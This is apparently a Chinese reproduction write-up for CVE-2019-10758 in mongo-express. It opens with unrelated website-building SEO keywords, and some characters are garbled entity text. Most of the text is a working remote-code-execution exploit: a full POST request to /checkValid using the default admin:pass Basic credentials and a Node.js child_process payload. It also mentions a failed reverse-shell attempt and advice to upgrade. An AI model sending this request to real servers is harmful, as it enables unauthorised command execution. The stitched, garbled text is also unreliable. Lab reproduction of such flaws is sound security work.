如何用rp做网站步骤,网站主色调,深圳网站制作建设公司,上海企业网站建设前言 mongo-express是一款mongodb的第三方Web界面#xff0c;使用node和express开发。如果攻击者可以成功登录#xff0c;或者目标服务器没有修改默认的账号密码#xff08;admin:pass#xff09;#xff0c;则可以执行任意node.js代码。 影响版本 mongo-express#xff… 前言 mongo-express是一款mongodb的第三方Web界面使用node和express开发。如果攻击者可以成功登录或者目标服务器没有修改默认的账号密码admin:pass则可以执行任意node.js代码。 影响版本 mongo-express 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后访问http://your-ip:8081即可查看到Web页面。 漏洞复现 直接发送如下数据包即可执行代码this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/success”)
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw
Content-Type: application/x-www-form-urlencoded
Content-Length: 124documentthis.constructor.constructor(return process)().mainModule.require(child_process).execSync(touch /tmp/success)反弹shell无果 修复建议
升级mongo-express到0.54.0或更高版本。